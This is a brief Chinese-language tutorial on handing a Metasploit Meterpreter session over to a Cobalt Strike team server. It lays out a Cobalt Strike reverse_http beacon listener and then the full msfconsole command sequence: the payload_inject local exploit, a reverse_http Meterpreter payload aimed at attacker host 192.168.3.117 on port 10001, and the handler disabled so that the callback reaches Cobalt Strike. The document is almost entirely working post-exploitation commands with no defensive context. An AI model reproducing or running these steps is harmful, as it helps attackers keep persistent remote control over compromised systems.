前提:MFS已經獲取到session,可以進入metepreter,現在需要使用cobaltstrike進行圖形化管理或團隊協作。 cobaltstrike起一個beacon監聽,如使用:windows/beacon_http/reverse_http 設置好host和port之后啟動監聽。
MSF中使用
use exploit/windows/local/payload_inject msf exploit(payload_inject) > set payload windows/meterpreter/reverse_http msf exploit(payload_inject) > set DisablePayloadHandler true msf exploit(payload_inject) > set LHOST 192.168.3.117 msf exploit(payload_inject) > set LPORT 10001 msf exploit(payload_inject) > set SESSION 1
注:set DisablePayloadHandler true
作用是msf不監聽,代表是用來返給其他監聽的 都設置好后 msf exploit(payload_inject) > run
去CS端查看結果
cs成功接收到msf中的session